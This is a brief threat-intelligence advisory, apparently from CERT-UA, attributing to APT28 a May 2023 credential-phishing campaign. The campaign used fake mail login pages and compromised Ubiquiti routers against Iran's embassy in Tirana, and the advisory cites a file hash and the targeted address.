The government computer emergency response team of Ukraine CERT-UA discovered HTML files that imitate the web interface of mail services (in particular, UKR.NET, Yahoo.com) and implement the technical possibility of exfiltrating authentication data entered by the victim using HTTP POST requests. At the same time, the transfer of stolen data is carried out using previously compromised Ubiquiti devices (EdgeOS).

Separate attention should be paid to the fact that one of the HTML files ("detail.html", MD5: b0ef610dffa854e239fca9475f35272a) contains the email address of the object of the attack: "iri_1357@yahoo.com". According to available data, the specified address belongs to the Embassy of the Islamic Republic of Iran in Tirana (Republic of Albania).

Based on the above, it is reasonable to conclude that the APT28 group, whose activities are directed by the Russian Federation, in May 2023, among other things, carried out a targeted cyber attack against the foreign diplomatic institution of Iran.

We would like to thank the representatives of the international research community (@cyber__sloth, @BushidoToken) who contribute to the fight against cyber threats directed, among other things, against Ukraine.

source